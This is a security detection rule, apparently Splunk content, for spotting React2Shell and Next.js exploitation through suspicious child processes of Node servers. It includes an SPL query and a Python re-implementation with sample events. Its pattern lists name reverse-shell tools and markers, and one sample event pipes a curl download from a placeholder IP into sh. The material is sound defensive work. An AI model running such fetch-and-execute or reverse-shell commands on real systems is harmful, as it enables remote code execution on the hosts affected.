Rare false positives might show up from child processes such as sh. Apply additional filters as needed.

Techniques

Sample rules

Linux Suspicious React or Next.js Child Process

Description

This analytic detects Linux processes such as sh, bash, and common Linux LOLBINs being spawned by React or Next.js application servers. In the context of CVE-2025-55182 / React2Shell / CVE-2025-66478 for Next.js, successful exploitation can lead to arbitrary JavaScript execution on the server, which in turn is commonly used to invoke Node's child_process APIs (for example child_process.execSync) to run OS-level commands. Public proof-of-concept payloads and observed in-the-wild exploit traffic show patterns where the vulnerable React Server Components handler triggers process.mainModule.require('child_process').execSync() to execute binaries such as ping, curl, or arbitrary shells on the underlying host. This detection focuses on suspicious child processes where a Next/React server process spawns an uncommon process. Such activity might be a strong indicator of exploitation of the aforementioned vulnerability.

Detection logic


| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime
  from datamodel=Endpoint.Processes
  where
    Processes.parent_process_name = "node"
    Processes.parent_process IN (
      "*--experimental-https*",
      "*--experimental-next-config-strip-types*",
      "*/node_modules/next*",
      "*next dev*",
      "*next start*",
      "*node_modules/.bin*",
      "*react-scripts start*",
      "*start-server.js*"
    )
    AND (
      Processes.process_name IN (
        "awk",
        "gawk",
        "ifconfig",
        "lua",
        "nc",
        "ncat",
        "netcat",
        "openssl",
        "perl",
        "php",
        "python",
        "python2",
        "python3",
        "ruby",
        "socat",
        "telnet"
      )
      OR (
        Processes.process_name IN ("curl", "wget")
        Processes.process = "*|*"
      )
      OR (
        Processes.process_name IN (
          "bash",
          "dash",
          "sh"
        )
        NOT Processes.process = "*-c*"
      )
      OR (
        Processes.process_name IN (
          "bash",
          "dash",
          "ksh",
          "sh",
          "zsh"
        )
        Processes.process IN (
          "*/dev/tcp/*",
          "*/dev/udp/*",
          "*0>&1*",
          "*curl*",
          "*exec *>&*",
          "*fsockopen*",
          "*ifconfig*",
          "*mkfifo*",
          "*nc *",
          "*ncat*",
          "*netcat*",
          "*proc_open*",
          "*s_client*",
          "*socat*",
          "*socket*",
          "*subprocess*",
          "*TCPSocket*",
          "*wget*"
        )
      )
    )
  by Processes.action Processes.dest Processes.original_file_name Processes.parent_process
     Processes.parent_process_exec Processes.parent_process_guid Processes.parent_process_id
     Processes.parent_process_name Processes.parent_process_path Processes.process
     Processes.process_exec Processes.process_guid Processes.process_hash Processes.process_id
     Processes.process_integrity_level Processes.process_name Processes.process_path
     Processes.user Processes.user_id Processes.vendor_product
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `linux_suspicious_react_or_next_js_child_process_filter`
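As an added illustration (not part of the original rule or the Splunk content), the where clause above re-implemented in Python and run over constructed sample Endpoint.Processes events, including the bare-sh case the false-positive note refers to. Paths, IPs and command lines in the samples are placeholders, and the four OR branches are kept in the same order as the rule so each sample can be traced to the branch that fires.

```python
import fnmatch

# Wildcard lists copied from the rule above. SPL uses only "*" as a wildcard and
# compares field values case-insensitively, so both sides are lower-cased here.
PARENT_PATTERNS = ["*--experimental-https*", "*--experimental-next-config-strip-types*",
                   "*/node_modules/next*", "*next dev*", "*next start*",
                   "*node_modules/.bin*", "*react-scripts start*", "*start-server.js*"]
SUSPICIOUS_CHILDREN = {"awk", "gawk", "ifconfig", "lua", "nc", "ncat", "netcat", "openssl",
                       "perl", "php", "python", "python2", "python3", "ruby", "socat", "telnet"}
SHELLS_NO_C = {"bash", "dash", "sh"}
SHELLS_ALL = {"bash", "dash", "ksh", "sh", "zsh"}
SHELL_ARG_PATTERNS = ["*/dev/tcp/*", "*/dev/udp/*", "*0>&1*", "*curl*", "*exec *>&*", "*fsockopen*",
                      "*ifconfig*", "*mkfifo*", "*nc *", "*ncat*", "*netcat*", "*proc_open*",
                      "*s_client*", "*socat*", "*socket*", "*subprocess*", "*TCPSocket*", "*wget*"]

def _any(patterns, value):
    return any(fnmatch.fnmatchcase(value.lower(), p.lower()) for p in patterns)

def matches_rule(ev):
    """Mirror of the rule's where clause for one Endpoint.Processes event."""
    if ev["parent_process_name"] != "node" or not _any(PARENT_PATTERNS, ev["parent_process"]):
        return False
    name, cmd = ev["process_name"], ev["process"]
    if name in SUSPICIOUS_CHILDREN:                      # branch 1: interpreters / network tools
        return True
    if name in {"curl", "wget"} and "|" in cmd:          # branch 2: downloader piped into something
        return True
    if name in SHELLS_NO_C and "-c" not in cmd:          # branch 3: bare shell (the LoFP case)
        return True
    return name in SHELLS_ALL and _any(SHELL_ARG_PATTERNS, cmd)  # branch 4: shell with risky args

# Constructed sample events (placeholder paths, IPs and commands, not real telemetry).
NEXT = "node /app/node_modules/next/dist/bin/next start"
SAMPLE_EVENTS = [
    {"parent_process_name": "node", "parent_process": NEXT, "process_name": "sh", "process": "sh"},
    {"parent_process_name": "node", "parent_process": NEXT, "process_name": "sh", "process": "sh -c 'echo ok'"},
    {"parent_process_name": "node", "parent_process": "node node_modules/.bin/next start",
     "process_name": "bash", "process": "bash -c 'mkfifo /tmp/f'"},
    {"parent_process_name": "node", "parent_process": NEXT, "process_name": "curl",
     "process": "curl http://203.0.113.5/x | sh"},
    {"parent_process_name": "node", "parent_process": "node /app/server.js",
     "process_name": "python3", "process": "python3 build.py"},
    {"parent_process_name": "nginx", "parent_process": "nginx: worker", "process_name": "sh", "process": "sh"},
]

def detect(events):
    """Indices of events the rule would surface; index 0 is the bare-sh false positive from the note."""
    return [i for i, ev in enumerate(events) if matches_rule(ev)]
```

Running `detect(SAMPLE_EVENTS)` surfaces events 0, 2 and 3; event 0 is exactly the benign-looking bare `sh` the false-positive note warns about, which is what the `_filter` macro at the end of the search exists to tune.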